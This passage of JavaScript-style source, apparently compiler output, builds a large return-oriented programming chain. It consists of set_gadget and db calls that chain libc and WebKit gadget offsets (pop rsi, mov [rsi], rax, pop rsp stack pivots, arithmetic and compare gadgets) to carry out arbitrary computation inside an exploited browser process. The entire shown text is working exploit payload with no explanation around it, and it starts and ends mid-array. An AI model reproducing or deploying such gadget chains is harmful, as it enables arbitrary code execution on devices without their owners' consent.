webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+484040, //L10479
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+483992, //L10476
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+484008, //L10477
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L10476:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L10477:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10478:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L10479:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+484136, //L10481
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+484120, //L10480
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L10480:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L10481:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+484216, //L10482
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L10482:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L10484:
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+484336, //L10487
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+484320, //L10485
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L10485:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10487:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+484512, //L10490
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+484528, //L10491
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+484480, //L10488
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+484496, //L10489
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L10488:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L10489:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10490:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L10491:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+484624, //L10493
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+484608, //L10492
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L10492:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L10493:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+484704, //L10494
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L10494:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L10496:
db([4294967284, 4294967295]); // -0xc
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+484824, //L10499
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+484808, //L10497
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L10497:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10499:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+485000, //L10502
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+485016, //L10503
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+484968, //L10500
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+484984, //L10501
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L10500:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L10501:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10502:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L10503:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+485112, //L10505
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+485096, //L10504
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L10504:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L10505:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+485192, //L10506
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L10506:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L10508:
db([4294967252, 4294967295]); // -0x2c
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+485312, //L10511
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+485296, //L10509
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L10509:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10511:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+485488, //L10514
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+485504, //L10515
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+485456, //L10512
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+485472, //L10513
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L10512:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L10513:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10514:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L10515:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+485664, //L10519
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+485632, //L10517
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+485648, //L10518
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L10516:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L10517:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10518:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L10519:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+485768, //L10521
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+485752, //L10520
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L10520:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L10521:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L10522:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L10523:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+346125, //setne al
libc_base+226597, //movzx eax, al
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+485936, //L10524
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L10524:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L10526:
db([4294967224, 4294967295]); // -0x48
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+486056, //L10529
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+486040, //L10527
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L10527:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10529:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+486232, //L10532
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+486248, //L10533
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+486200, //L10530
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+486216, //L10531
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L10530:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L10531:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10532:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L10533:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+486408, //L10537
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+486376, //L10535
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+486392, //L10536
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L10534:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L10535:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10536:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L10537:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+486512, //L10539
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+486496, //L10538
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L10538:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L10539:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+486592, //L10540
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L10540:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L10542:
db([32, 0]); // 0x20
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+486712, //L10545
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+486696, //L10543
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L10543:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10545:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+486856, //L10548
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+486824, //L10546
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+486840, //L10547
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L10546:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10547:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L10548:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+486936, //L10549
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L10549:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L10551:
db([4294967272, 4294967295]); // -0x18
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+487056, //L10554
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+487040, //L10552
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L10552:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10554:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+487200, //L10557
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+487168, //L10555
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+487184, //L10556
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L10555:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10556:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L10557:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+487280, //L10558
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L10558:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L10560:
db([24, 0]); // 0x18
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+487400, //L10563
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+487384, //L10561
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L10561:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10563:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+487544, //L10566
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+487512, //L10564
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+487528, //L10565
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L10564:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10565:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L10566:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+487624, //L10567
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L10567:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L10569:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+487744, //L10572
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+487728, //L10570
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L10570:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10572:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+487888, //L10575
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+487856, //L10573
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+487872, //L10574
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L10573:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10574:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L10575:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608, //pop rax
//L10577:
ropchain+487992, //L10576
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+782311, //pop rsp
ropchain+275424, //__ntoa_long
//L10576:
libc_base+853989, //mov rax, rcx
libc_base+764760 //pop rsi
]);
db([4294967216, 4294967295]); // -0x50
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+488064, //L10578
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L10578:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L10580:
db([4294967272, 4294967295]); // -0x18
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+20307877, //mov [rax], rcx
libc_base+764760, //pop rsi
ropchain+488144, //L10581
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L10581:
db([0, 0]); // 0x0
//L10313:
//L10168:
//L10025:
set_gadgets([
libc_base+764760, //pop rsi
ropchain+488192, //L10583
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L10583:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L10585:
db([40, 0]); // 0x28
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+488312, //L10588
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+488296, //L10586
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L10586:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10588:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+488456, //L10591
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+488424, //L10589
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+488440, //L10590
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L10589:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10590:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L10591:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+488544, //L10593
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+764760 //pop rsi
]);
//L10592:
db([1, 0]); // 0x1
set_gadget(libc_base+759608,); //pop rax
//L10593:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+488600, //L10594
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L10594:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L10596:
db([40, 0]); // 0x28
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+20307877, //mov [rax], rcx
libc_base+764760, //pop rsi
ropchain+488680, //L10598
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L10598:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+782311, //pop rsp
ropchain+548864, //L10599
//L8486:
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L10600:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L10602:
db([4294967220, 4294967295]); // -0x4c
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+488832, //L10604
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L10603:
db([1, 0]); // 0x1
set_gadget(libc_base+759608,); //pop rax
//L10604:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+3488438, //mov [rax], ecx
libc_base+731401, //mov rax, r8
libc_base+764760 //pop rsi
]);
//L10606:
db([4294967292, 4294967295]); // -0x4
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+488968, //L10609
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+488952, //L10607
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L10607:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10609:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+489144, //L10612
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+489160, //L10613
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+489112, //L10610
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+489128, //L10611
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L10610:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L10611:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10612:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L10613:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+489256, //L10615
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+489240, //L10614
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L10614:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L10615:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L10616:
db([1, 0]); // 0x1
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L10617:
db([1, 0]); // 0x1
set_gadget(libc_base+763368,); //pop rcx
//L10618:
db([1, 0]); // 0x1
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+489456, //L10620
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L10620:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+489512, //L10621
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L10621:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+14664103, //and rax, rcx
libc_base+764760, //pop rsi
ropchain+489648, //L10625
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+489632, //L10624
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L10623:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L10624:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L10625:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+489768, //L10628
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+489736, //L10626
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L10626:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L10627:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L10628:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+489904, //L10630
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+489920, //L10631
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+489888, //L10629
